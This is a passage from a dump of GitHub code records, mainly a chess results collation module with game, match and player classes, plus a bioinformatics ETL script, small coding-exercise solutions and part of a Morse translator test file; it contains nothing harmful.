EER:\\n\\t{round(eer, 2)} kcal/dia\\n')\n print(sep)\n option = input('\\n\\nAperte ENTER para voltar ao menu')\n","repo_name":"Zac-Milioli/Code_Testing_and_General_Functions","sub_path":"GeneralPython/Miscelaneous/EER_calculator.py","file_name":"EER_calculator.py","file_ext":"py","file_size_in_byte":10286,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"5091345686","text":"#!/usr/bin/env python3\n\nimport re\n\nfrom os import path\n\nfrom cda_etl.lib import load_tsv_as_dict, map_columns_one_to_many, map_columns_one_to_one, sort_file_with_header\n\n# PARAMETERS\n\ninput_dir = path.join( 'extracted_data', 'gdc', 'projects', 'tsv' )\n\ninput_data = {\n \n 'program' : load_tsv_as_dict( path.join( input_dir, 'program.tsv' ) ),\n 'project' : load_tsv_as_dict( path.join( input_dir, 'project.tsv' ) ),\n 'project_in_program' : map_columns_one_to_many( path.join( input_dir, 'project_in_program.tsv' ), 'program_id', 'project_id' ),\n 'project_studies_disease_type' : map_columns_one_to_many( path.join( input_dir, 'project_studies_disease_type.tsv' ), 'project_id', 'disease_type' ),\n 'project_studies_primary_site' : 
map_columns_one_to_many( path.join( input_dir, 'project_studies_primary_site.tsv' ), 'project_id', 'primary_site' )\n}\n\noutput_dir = path.join( 'auxiliary_metadata', '__project_crossrefs' )\n\noutput_file = path.join( output_dir, 'GDC_all_programs_and_projects.tsv' )\n\noutput_fields = [\n \n 'program.program_id',\n 'program.name',\n 'program.dbgap_accession_number',\n 'project.project_id',\n 'project.name',\n 'project.dbgap_accession_number',\n 'project.disease_types_studied',\n 'project.primary_sites_studied'\n]\n\n# EXECUTION\n\nwith open( output_file, 'w' ) as OUT:\n \n print( *output_fields, sep='\\t', end='\\n', file=OUT )\n\n for program_id in sorted( input_data['program'] ):\n \n program_name = input_data['program'][program_id]['name']\n program_dbgap_accession_number = input_data['program'][program_id]['dbgap_accession_number']\n\n for project_id in sorted( input_data['project_in_program'][program_id] ):\n \n project_name = input_data['project'][project_id]['name']\n project_dbgap_accession_number = input_data['project'][project_id]['dbgap_accession_number']\n\n disease_type_string = '[]'\n\n if project_id in input_data['project_studies_disease_type']:\n \n disease_types = list()\n\n for disease_type in sorted( input_data['project_studies_disease_type'][project_id] ):\n \n disease_type = re.sub( r',', r'\\,', disease_type )\n disease_type = re.sub( r\"'\", r\"\\'\", disease_type )\n\n disease_types.append( disease_type )\n\n disease_type_string = r\"['\" + \"', '\".join( disease_types ) + r\"']\"\n\n primary_site_string = '[]'\n\n if project_id in input_data['project_studies_primary_site']:\n \n primary_sites = list()\n\n for primary_site in sorted( input_data['project_studies_primary_site'][project_id] ):\n \n primary_site = re.sub( r',', r'\\,', primary_site )\n primary_site = re.sub( r\"'\", r\"\\'\", primary_site )\n\n primary_sites.append( primary_site )\n\n primary_site_string = r\"['\" + \"', '\".join( primary_sites ) + r\"']\"\n\n print( *[ program_id, program_name, program_dbgap_accession_number, project_id, project_name, project_dbgap_accession_number, disease_type_string, primary_site_string ], sep='\\t', end='\\n', file=OUT )\n\n\n","repo_name":"CancerDataAggregator/transform","sub_path":"python_package/src/cda_etl/auxiliary_scripts/104_enumerate_gdc_program_project_hierarchy.py","file_name":"104_enumerate_gdc_program_project_hierarchy.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"38451843372","text":"n = int(input())\nL = list(map(int,input().split()))\nlim = (250,275,300,301)\n\nans = []\nfor i in L:\n for j in range(4):\n if i < lim[j]:\n ans.append(4-j)\n break\nprint(*ans)","repo_name":"LightPotato99/baekjoon","sub_path":"0_Competitions/utilcup1/A_previousLevel.py","file_name":"A_previousLevel.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13214258033","text":"import re\nfrom collections import namedtuple\n\nfrom solentware_misc.core.null import Null\n\nfrom .gameresults import (\n displayresult,\n home_player_pieces,\n displayresulttag,\n resultmap,\n match_score_difference,\n match_score_total,\n)\nfrom . 
import constants\n\n_GRADE_ONLY_TAG = {\n True: \"grading only\",\n}\n\n# Grading code is [0-9]{6}[A-M] but accept [0-9]{3} embedded in a word to allow\n# for a one character typo in the grading code or a one character digit typo in\n# the name.\n# This also catches ECF Membership numbers, 3-digit ECF grades, and 4-digit\n# ratings; although the tolerance for typing errors is less.\n# Text in brackets containing a digit are treated as a code: '(UG est 170)' for\n# example. The '{}', '[]', and '<>', pairs are not treated as codes at present\n# because they do not survive till code_in_name is used.\ncode_in_name = re.compile(r\"\\([^0-9]*[0-9].*?\\)|\\s*[^\\s]*[0-9]{3}[^\\s]*\\s*\")\n\n\nclass GameObjectsError(Exception):\n \"\"\"Exception class for gameobjects module.\"\"\"\n\n\ndef split_codes_from_name(name_and_codes):\n \"\"\"Return tuple(name, set(codes)) from name_and_codes.\"\"\"\n codes = set(s.strip() for s in code_in_name.findall(name_and_codes))\n name = \" \".join(\n [s.strip() for s in code_in_name.split(name_and_codes)]\n ).strip()\n return (name, codes)\n\n\nclass MatchFixture:\n \"\"\"Detail of a fixture extracted from a fixture list file.\"\"\"\n\n attributes = {\n \"competition\": None,\n \"source\": None,\n \"round\": None,\n \"hometeam\": None,\n \"awayteam\": None,\n \"date\": None,\n \"day\": None,\n \"pdate\": None,\n \"dateok\": None,\n }\n\n def __init__(self, tagger=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n self.__dict__[\"tagger\"] = tagger\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n\n def __eq__(self, other):\n \"\"\"Return True if self[a]==other[a] for MatchFixture.attributes.\"\"\"\n for attribute in MatchFixture.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n return True\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n\nclass Game:\n \"\"\"Detail of a game result extracted from event report.\"\"\"\n\n attributes = {\n \"result\": None,\n \"date\": None,\n \"homeplayerwhite\": None, # True|False|None. None means \"not known\"\n \"homeplayer\": None, # the leftmost player in \"Smith 1-0 Jones\" etc\n \"awayplayer\": None, # the rightmost player in \"Smith 1-0 Jones\" etc\n \"gradegame\": True, # True|False. True means store result for grading\n }\n\n def __init__(self, tagger=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n # SLMatchGame sets gradegame to False if homeplayer or awayplayer is\n # default. Should that come here or should caller be responsible for\n # setting gradegame argument. 
Round by round swiss results, not match\n # games, may say something like 'J Smith 1-0 default' too.\n self.__dict__[\"tagger\"] = tagger\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n\n def __eq__(self, other):\n \"\"\"Return True if self[a] == other[a] for a in Game.attributes.\"\"\"\n for attribute in self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n return True\n\n def __ne__(self, other):\n \"\"\"Return True if self[a] != other[a] for a in Game.attributes.\"\"\"\n for attribute in self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return True\n return False\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n @staticmethod\n def game_result_exists(result):\n \"\"\"Return True if game result is allowed.\"\"\"\n return result in resultmap\n\n def get_print_result(self):\n \"\"\"Return (, ).\n\n Typically returns ('', 'unfinished') where match report includes an\n unfinished game\n\n \"\"\"\n return (\n displayresult.get(self.result, \"\"),\n displayresulttag.get(self.result, \"\"),\n )\n\n def is_inconsistent(self, other, problems):\n \"\"\"Return True if attribute values of self and other are inconsistent.\n\n Used to check that duplicate reports of a game are consistent allowing\n for previously unknown detail to be added. Such as the result of an\n unfinished game.\n\n \"\"\"\n state = False\n if self.homeplayer.is_inconsistent(other.homeplayer, problems):\n problems.add(constants.HOME_PLAYER)\n state = True\n if self.awayplayer.is_inconsistent(other.awayplayer, problems):\n problems.add(constants.AWAY_PLAYER)\n state = True\n if self.homeplayerwhite != other.homeplayerwhite:\n if other.homeplayer:\n problems.add(constants.HOME_PLAYER_WHITE)\n state = True\n if self.result != other.result:\n if other.result:\n problems.add(constants.RESULT_DUP_REP)\n state = True\n return state\n\n @staticmethod\n def get_game_board_and_round():\n \"\"\"Return tuple of \"\"s for game details in tabular format.\"\"\"\n return (\"\",) * 2\n\n\nclass MatchGame(Game):\n \"\"\"Detail of a game result extracted from a file of match reports.\n\n MatchGame.attributes is Game.attributes plus board\n\n \"\"\"\n\n # PDLRapidplayMatchGame is not used because each game is reported in full.\n # The problem is interpreting scores like 1-1. Is that two draws or one\n # win by each player, and who had white pieces in each game? 
The result\n # '1.5-0.5' retains the white pieces question.\n # See Game for notes on SLMatchGame.\n\n attributes = {\n \"board\": None,\n \"gradingonly\": None,\n }\n attributes.update(Game.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Add board and gradingonly to attributes checked for consistency.\"\"\"\n state = False\n if self.board != other.board:\n if other.board:\n problems.add(constants.BOARD_DUP_REP)\n state = True\n if self.gradingonly != other.gradingonly:\n problems.add(constants.GRADING_ONLY)\n state = True\n i = super().is_inconsistent(other, problems)\n return i or state\n\n def is_game_counted_in_match_score(self):\n \"\"\"Return True if game is not 'for grading only'.\"\"\"\n return not self.gradingonly\n\n def get_print_result(self):\n \"\"\"Return (, ).\n\n Typically returns ('', 'unfinished') where match report includes an\n unfinished game\n\n \"\"\"\n return (\n displayresult.get(self.result, \"\"),\n displayresulttag.get(\n self.result,\n \"\" if self.result in displayresult else \"invalid result\",\n ),\n _GRADE_ONLY_TAG.get(self.gradingonly, \"\"),\n )\n\n def get_game_board_and_round(self):\n \"\"\"Return tuple(self.board, \"\"0 for game details in tabular format.\"\"\"\n return (self.board, \"\")\n\n\nclass UnfinishedGame(MatchGame):\n \"\"\"Detail of a completed match game originally reported unfinished.\"\"\"\n\n # A merge of pdlcollation.UnfinishedGame and slcollation.SLMatchGame is\n # used. The PDL version has the right superclass but the game_result\n # method is broken. (And much later removed because it is not used.)\n # The gameresult constant is copied from slcollation to an upper case name.\n # UnfinishedGame in slcollation is not a subclass of SLMatchGame to leave\n # out the gradingonly attribute, but that attribute has been added to Game.\n # (Also removed when game_result method removed.)\n\n attributes = {\n \"source\": None,\n \"section\": None,\n \"competition\": None,\n \"hometeam\": None,\n \"awayteam\": None,\n }\n attributes.update(MatchGame.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Extend to compare PDL attributes. Return True if inconsistent.\"\"\"\n state = False\n if self.source != other.source:\n problems.add(constants.SOURCE_DUP_REP)\n state = True\n if self.section != other.section:\n problems.add(constants.SECTION)\n state = True\n if self.competition != other.competition:\n problems.add(constants.COMPETITION_DUP_REP)\n state = True\n if self.hometeam != other.hometeam:\n problems.add(constants.HOME_TEAM_NAME)\n state = True\n if self.awayteam != other.awayteam:\n problems.add(constants.AWAY_TEAM_NAME)\n state = True\n\n # The MatchGame notion for consistency of board may not be reliable for\n # unfinished game reports if the board has been calculated from it's\n # position in the report.\n # In other words, the problem is what we are told about the game, not\n # whether UnfinishedGame should be a subclass of MatchGame.\n # Actually the best name for this class is UnfinishedMatchGame because\n # it is possible for individual games to be unfinished. 
Such games are\n # almost always not reported at all until they are finished.\n # Better would be a separate class for defaulted games, as it seems to\n # be use of UnfinishedGame for those which first caused the problem.\n if self.homeplayer.is_inconsistent(other.homeplayer, problems):\n problems.add(constants.HOME_PLAYER)\n state = True\n if self.awayplayer.is_inconsistent(other.awayplayer, problems):\n problems.add(constants.AWAY_PLAYER)\n state = True\n\n # Surely wrong to do this now, or in pre problems argument code.\n # if (self.homeplayerwhite == other.homeplayerwhite and\n # self.result == other.result and\n # self.gradingonly == other.gradingonly):\n # return state\n\n for game in (self, other):\n for player in (game.homeplayer, game.awayplayer):\n if not isinstance(player, Null):\n if self.result != other.result:\n if other.result:\n problems.add(constants.RESULT_DUP_REP)\n state = True\n return state\n\n\nclass SwissGame(Game):\n \"\"\"Detail of a game result extracted from a file of swiss reports.\n\n SwissGame.attributes is Game.attributes plus round\n\n \"\"\"\n\n attributes = {\n \"round\": None,\n }\n attributes.update(Game.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Extend, add round to the attributes checked to return True.\"\"\"\n state = False\n if self.round != other.round:\n if other.round:\n problems.add(constants.ROUND_DUP_REP)\n state = True\n i = super().is_inconsistent(other, problems)\n return i or state\n\n def get_game_board_and_round(self):\n \"\"\"Return tuple(\"\", self.round) for game details in tabular format.\"\"\"\n return (\"\", self.round)\n\n\nclass SwissMatchGame(Game):\n \"\"\"Detail of a game result extracted from a file of swiss match reports.\n\n SwissMatchGame.attributes is Game.attributes plus board and round\n\n \"\"\"\n\n attributes = {\n \"board\": None,\n \"round\": None,\n }\n attributes.update(Game.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Extend, add board round to the attributes checked to return True.\"\"\"\n state = False\n if self.round != other.round:\n if other.round:\n problems.add(constants.ROUND_DUP_REP)\n state = True\n if self.board != other.board:\n if other.board:\n problems.add(constants.BOARD_DUP_REP)\n state = True\n i = super().is_inconsistent(other, problems)\n return i or state\n\n def get_game_board_and_round(self):\n \"\"\"Return tuple(self.board, self.round) for tabular format.\"\"\"\n return (self.board, self.round)\n\n\nclass Section:\n \"\"\"Detail of a result extracted from a file of event reports.\"\"\"\n\n attributes = {\n \"competition\": None,\n \"order\": None, # f(source) for sorting\n \"source\": None, # tag to identify duplicate match reports\n \"games\": None,\n \"date\": None,\n \"day\": None,\n \"pdate\": None,\n \"dateok\": None,\n }\n\n def __init__(self, tagger=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n self.__dict__[\"tagger\"] = tagger\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n\n def __eq__(self, other):\n \"\"\"Return True if self[a] == other[a] for a in Section.attributes.\"\"\"\n for attribute in self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n return True\n\n def __ne__(self, other):\n \"\"\"Return True if self[a] != other[a] for a in Section.attributes.\"\"\"\n for attribute in 
self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return True\n return False\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n def __ge__(self, other):\n \"\"\"Return True if id(self) >= id(other).\"\"\"\n return id(self) >= id(other)\n\n def __gt__(self, other):\n \"\"\"Return True if id(self) > id(other).\"\"\"\n return id(self) > id(other)\n\n def __le__(self, other):\n \"\"\"Return True if id(self) <= id(other).\"\"\"\n return id(self) <= id(other)\n\n def __lt__(self, other):\n \"\"\"Return True if id(self) < id(other).\"\"\"\n return id(self) < id(other)\n\n @staticmethod\n def get_team_details():\n \"\"\"Return tuple of \"\"s for team details in tabular format.\"\"\"\n return (\"\",) * 6\n\n\nclass MatchReport(Section):\n \"\"\"Detail of a match result extracted from a file of match reports.\n\n MatchGame.attributes is Section.attributes plus round hometeam and so on\n\n \"\"\"\n\n attributes = {\n \"round\": None,\n \"hometeam\": None,\n \"homescore\": None,\n \"awayteam\": None,\n \"awayscore\": None,\n \"default\": None,\n }\n attributes.update(Section.attributes)\n\n def get_unfinished_games_and_score_consistency(self):\n \"\"\"Return (unfinished game, match and game score consistency).\n\n This method serves two masters: one treats an inconsistency as an error\n while the other treats it as a warning and makes use of the list of\n unfinished games in the returned tuple.\n\n \"\"\"\n ufg = []\n difference = 0\n points = 0\n force_inconsistent = False\n for game in self.games:\n if game.result not in displayresult:\n ufg.append(game)\n if game.is_game_counted_in_match_score():\n i = match_score_difference.get(game.result)\n if i is None:\n force_inconsistent = True\n else:\n difference += i\n i = match_score_total.get(game.result)\n if i is None:\n force_inconsistent = True\n else:\n points += i\n try:\n homepoints = float(self.homescore)\n except ValueError:\n homepoints = 0\n try:\n awaypoints = float(self.awayscore)\n except ValueError:\n awaypoints = 0\n if self.default and len(ufg) == 0:\n consistent = True\n elif points != homepoints + awaypoints:\n consistent = False\n elif difference != homepoints - awaypoints:\n consistent = False\n else:\n consistent = True\n return ufg, consistent or force_inconsistent\n\n def get_team_details(self):\n \"\"\"Return tuple of team details for tabular format.\"\"\"\n return (\n self.round,\n self.hometeam,\n self.homescore,\n self.awayteam,\n self.awayscore,\n self.default,\n )\n\n\nclass Player:\n \"\"\"A player in an event.\"\"\"\n\n # There is a design flaw here because the attributes 'tagger', '_identity',\n # and 'reported codes', are left out of 'attributes' because they do not\n # contribute to the __eq__ and __ne__ methods.\n # These should be included for the __setattr__ and __getattr__ methods.\n attributes = {\n \"name\": None,\n \"event\": None,\n \"startdate\": None,\n \"enddate\": None,\n \"section\": None, # eg. swiss tournament or league division\n \"club\": None, # the club played for in league\n \"pin\": None,\n \"affiliation\": None, # eg. 
club or location (ECF \"club\")\n }\n\n def __init__(self, tagger=None, reported_codes=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n self.__dict__[\"tagger\"] = tagger\n self.__dict__[\"reported_codes\"] = reported_codes\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n if self.club:\n self.set_player_identity_club()\n # Comment this line to avoid pylint unused-variable report.\n affiliation = self.club # Should this be \"self.affiliation =\"?\n elif self.section:\n self.set_player_identity_section()\n else:\n self.set_player_identity()\n\n def __eq__(self, other):\n \"\"\"Return True if self[a] == other[a] for a in Player.attributes.\"\"\"\n for attribute in Player.attributes:\n\n # Hack because Null instance represents a defaulting player, and\n # may get compared when sorting.\n try:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n except KeyError:\n if isinstance(other, Null):\n return False\n raise\n return True\n\n def __ne__(self, other):\n \"\"\"Return True if self[a] != other[a] for a in Player.attributes.\"\"\"\n for attribute in Player.attributes:\n\n # Hack because Null instance represents a defaulting player, and\n # may get compared when sorting.\n try:\n if self.__dict__[attribute] != other.__getattr__(attribute):\n return True\n except KeyError:\n if isinstance(other, Null):\n return False\n raise\n return False\n\n # introduced for compatibility with NullPlayer class\n # guardian if statement probably not needed\n def __getattr__(self, name):\n \"\"\"Allow return self[name] if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n return self.__dict__[name]\n raise AttributeError(name)\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n def get_brief_identity(self):\n \"\"\"Return tuple(name, pin|club|False|None) elements of player identity.\n\n For use when dealing with players within a section of an event.\n\n \"\"\"\n if self.club:\n return (self.name, self.club)\n if self.section:\n if self.pin:\n return (self.name, self.pin)\n return (self.name, False)\n return (self.name, None)\n\n def get_full_identity(self):\n \"\"\"Return a tab separated string containing player identity.\"\"\"\n if self.club:\n return \"\\t\".join(\n (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.club,\n )\n )\n if self.section:\n if self.pin:\n return \"\\t\".join(\n (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n str(self.pin),\n )\n )\n return \"\\t\".join(\n (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n )\n )\n return \"\\t\".join((self.name, self.event, self.startdate, self.enddate))\n\n def get_identity(self):\n \"\"\"Return tuple of player identity with fillers for absent elements.\n\n For use as database key where known format helps a lot\n\n \"\"\"\n if self.club:\n return (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.club,\n None,\n )\n if self.section:\n if self.pin:\n return (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n self.pin,\n )\n return (\n self.name,\n 
self.event,\n self.startdate,\n self.enddate,\n self.section,\n False,\n )\n return (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n None,\n None,\n )\n\n def get_player_event(self):\n \"\"\"Return a tuple containing event part of player identity.\"\"\"\n return (self.event, self.startdate, self.enddate)\n\n def get_player_identity(self):\n \"\"\"Return tuple containing player identity.\"\"\"\n return self._identity\n\n def get_player_section(self):\n \"\"\"Return section part of player identity or None.\"\"\"\n if self.club:\n return self.club\n if self.section:\n return self.section\n return None\n\n def get_short_identity(self):\n \"\"\"Return tab separated string of player identity excluding event.\n\n Includes the section if present.\n\n \"\"\"\n if self.club:\n return \"\\t\\t\".join((self.name, self.club))\n if self.section:\n if self.pin:\n return \"\".join(\n (self.name, \"\\t\\t\", self.section, \" \", str(self.pin))\n )\n return \"\".join((self.name, \"\\t\\t\", self.section))\n return \"\\t\".join((self.name,))\n\n def is_inconsistent(self, other, problems):\n \"\"\"Return True if attribute values of self and other are inconsistent.\n\n Used to check that duplicate reports of a game are consistent allowing\n for previously unknown detail to be added. Such as the name of a\n player.\n\n \"\"\"\n del problems\n # state = False\n for attribute in Player.attributes:\n if self.__dict__[attribute] != other.__getattr__(attribute):\n if other.__getattr__(attribute):\n\n # Listing attribute names as problems may be too much.\n # problems.add(attribute)\n\n # state = True\n return True\n # return state\n return False\n\n def add_reported_codes(self, code):\n \"\"\"Add code(s) to self.reported_codes.\"\"\"\n self.__dict__[\"reported_codes\"].update(code)\n\n def get_reported_codes(self):\n \"\"\"Return space separated string of reported codes.\n\n Usually a grading code, but membership numbers and grades may be\n common too. 
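The codes are joined with\n single spaces, so two reported codes such as '123456A' and '180' come\n back as '123456A 180'.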
Any element of 'name' containing a digit (0-9) will be\n treated as a code by the parser.\n\n \"\"\"\n return \" \".join(\n self.reported_codes if self.reported_codes is not None else \"\"\n )\n\n def set_player_identity(self):\n \"\"\"Set player identity where club or section is not relevant.\"\"\"\n self.__dict__[\"_identity\"] = (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n )\n\n def set_player_identity_club(self):\n \"\"\"Set player identity where club is relevant.\"\"\"\n self.__dict__[\"_identity\"] = (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.club,\n )\n\n def set_player_identity_section(self):\n \"\"\"Set player identity where section is relevant.\"\"\"\n self.__dict__[\"_identity\"] = (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n self.pin,\n )\n\n\n# GameCollation is superclass of Collation and CollationEvents, the latter used\n# when importing data from another database.\nclass GameCollation:\n \"\"\"Base class for results extracted from a file of game reports.\"\"\"\n\n def __init__(self):\n \"\"\"Define game and player dictionaries and error report list.\"\"\"\n super().__init__()\n self.games = dict()\n self.players = dict()\n\n def set_games(self, key, gamelist):\n \"\"\"Note gamelist in games dictionary under key.\"\"\"\n self.games[key] = gamelist\n\n def set_player(self, player):\n \"\"\"Note player in players dictionary under key if not present.\"\"\"\n key = player.get_player_identity()\n if key not in self.players:\n self.players[key] = player\n\n\n# The element names are in the order which gives a useful sort order.\nTabularReportRow = namedtuple(\n \"TabularReportRow\",\n constants.TABULAR_REPORT_ROW_ORDER,\n defaults=(\"\",) * len(constants.TABULAR_REPORT_ROW_ORDER),\n)\n\n\ndef get_game_rows_for_csv_format(collated_games):\n \"\"\"Return list of dicts representing collated games for an event.\n\n It is assumed sourceedit.SourceEdit._collate_unfinished_games()\n has been called if required.\n\n \"\"\"\n rows = []\n\n # The event name is only available as an attribute of the Player\n # instances found. 
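Each row built below therefore takes its event\n # name from whichever of the two players reports one, via\n # 'homeplayer.event or awayplayer.event'.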
All these instances must have the same event\n # name, except that defaulted games will produce None as the\n # event name for one or both players of a game.\n # Player represents a bundle of games reported under one name in\n # a section of an event: it does not represent the person playing\n # in an event or a game.\n # If eventname is None after processing the report either there\n # are no games or all games were double defaults.\n eventname = None\n\n for value in collated_games.values():\n (\n round_,\n hometeam,\n homescore,\n awayteam,\n awayscore,\n default,\n ) = value.get_team_details()\n if default:\n continue\n for game in value.games:\n if not game.gradegame:\n continue\n gameboard, gameround = game.get_game_board_and_round()\n if round_:\n if gameround and round_ != gameround:\n raise GameObjectsError(\n \"Inconsistent round given in game and section\"\n )\n\n # Note re-binding of homeplayer and awayplayer in this block.\n # Allow for double default games when checking consistency of\n # event name references.\n homeplayer = game.homeplayer\n awayplayer = game.awayplayer\n if (\n homeplayer is not None\n and awayplayer is not None\n and homeplayer.event is not None\n and awayplayer.event is not None\n ):\n if homeplayer.event != awayplayer.event:\n raise GameObjectsError(\n \"Inconsistent event names for players of game\"\n )\n game_eventname = homeplayer.event or awayplayer.event\n if eventname is None:\n eventname = game_eventname\n if (\n homeplayer.event is not None\n and awayplayer.event is not None\n and game_eventname != eventname\n ):\n raise GameObjectsError(\n \"Inconsistent event names for game in event\"\n )\n if homeplayer.reported_codes is not None:\n homeplayer = \" \".join(\n (\n \" \".join(homeplayer.reported_codes),\n homeplayer.name,\n )\n ).strip()\n else:\n homeplayer = homeplayer.name\n if awayplayer.reported_codes is not None:\n awayplayer = \" \".join(\n (\n awayplayer.name,\n \" \".join(awayplayer.reported_codes),\n )\n ).strip()\n else:\n awayplayer = awayplayer.name\n\n # The **{} arguments are in the default order of a tabular\n # source report. (The order before conversion to namedtuple.)\n rows.append(\n TabularReportRow(\n **{\n constants.REPORT_SECTION: value.competition,\n constants.REPORT_DAY: \"\",\n constants.REPORT_DATE: game.date,\n constants.REPORT_ROUND: gameround,\n constants.REPORT_HOME_TEAM: hometeam,\n constants.REPORT_HOME_TEAM_SCORE: homescore,\n constants.REPORT_HOME_PLAYER: homeplayer,\n constants.REPORT_RESULT: displayresult.get(\n game.result, \"\"\n ),\n constants.REPORT_AWAY_PLAYER: awayplayer,\n constants.REPORT_AWAY_TEAM_SCORE: awayscore,\n constants.REPORT_AWAY_TEAM: awayteam,\n constants.REPORT_BOARD: gameboard,\n constants.REPORT_HOME_PLAYER_COLOUR: (\n home_player_pieces[game.homeplayerwhite]\n ),\n constants.REPORT_EVENT: eventname,\n }\n )\n )\n\n return rows\n","repo_name":"RogerMarsh/chessvalidate","sub_path":"chessvalidate/core/gameobjects.py","file_name":"gameobjects.py","file_ext":"py","file_size_in_byte":32262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30338316477","text":"#1,4,7은 L, 3,6,9는 R을 Answer에 추가\n#2,5,8,0-> 1. 누가 더 가깝나 2. 
if the distances are equal, use the dominant hand\n#store the position of each hand after every move\n#define a function that computes the distance\nnumbers = [1, 3, 4, 5, 8, 2, 1, 4, 5, 9, 5]\nhand = \"right\"\nanswer = \"\"\np_dict = {1:(0,0), 2:(0,1), 3:(0,2), 4:(1,0), 5:(1,1),\n 6:(1,2), 7:(2,0), 8:(2,1), 9:(2,2), '*':(3,0), 0:(3,1), '#':(3,2)}\nl_pos = '*'\nr_pos = '#'\nfor i in numbers:\n if i in (1,4,7):\n answer += \"L\"\n l_pos = i\n elif i in (3,6,9):\n answer += \"R\"\n r_pos = i\n else:\n l_dis = abs(p_dict[l_pos][0]-p_dict[i][0])+abs(p_dict[l_pos][1]-p_dict[i][1])\n r_dis = abs(p_dict[r_pos][0]-p_dict[i][0])+abs(p_dict[r_pos][1]-p_dict[i][1])\n if l_dis < r_dis:\n answer += \"L\"\n l_pos = i\n elif l_dis > r_dis:\n answer += \"R\"\n r_pos = i\n else:\n if hand == \"right\":\n answer += \"R\"\n r_pos = i\n else:\n answer += \"L\"\n l_pos = i\nprint(answer)","repo_name":"minju7346/CordingTest","sub_path":"programmers/1_7.py","file_name":"1_7.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42562604459","text":"import unittest\nfrom parameterized import parameterized\nfrom morse_translator_cli import create_parser, process_args\n\n\nclass TestCLI(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.parser = create_parser()\n\n @parameterized.expand([\n ([\"--encode\", \"ABC\"], \"ABC\", True, False, \".\", \"-\", \" \", \"/\"),\n ([\"--decode\", \".- -... -.-.\"], \".- -... -.-.\", False, True, \".\", \"-\", \" \", \"/\"),\n (\n [\"--encode\", \"ABC\", \"--dot\", \"+\", \"--dash\", \"=\", \"--separator\", \"_\", \"--space\", \"&\"],\n \"ABC\", True, False, \"+\", \"=\", \"_\", \"&\"\n ),\n ])\n def test_parser(self, input_args, string, encode, decode, dot, dash, separator, space):\n args = self.parser.parse_args(input_args)\n self.assertEqual(string, args.string)\n self.assertEqual(encode, args.encode)\n self.assertEqual(decode, args.decode)\n self.assertEqual(dot, args.dot)\n self.assertEqual(dash, args.dash)\n self.assertEqual(separator, args.separator)\n self.assertEqual(space, args.space)\n\n @parameterized.expand([\n ([\"--encode\", \"ABC\"], \".- -... -.-.\"),\n ([\"--decode\", \".- -... 
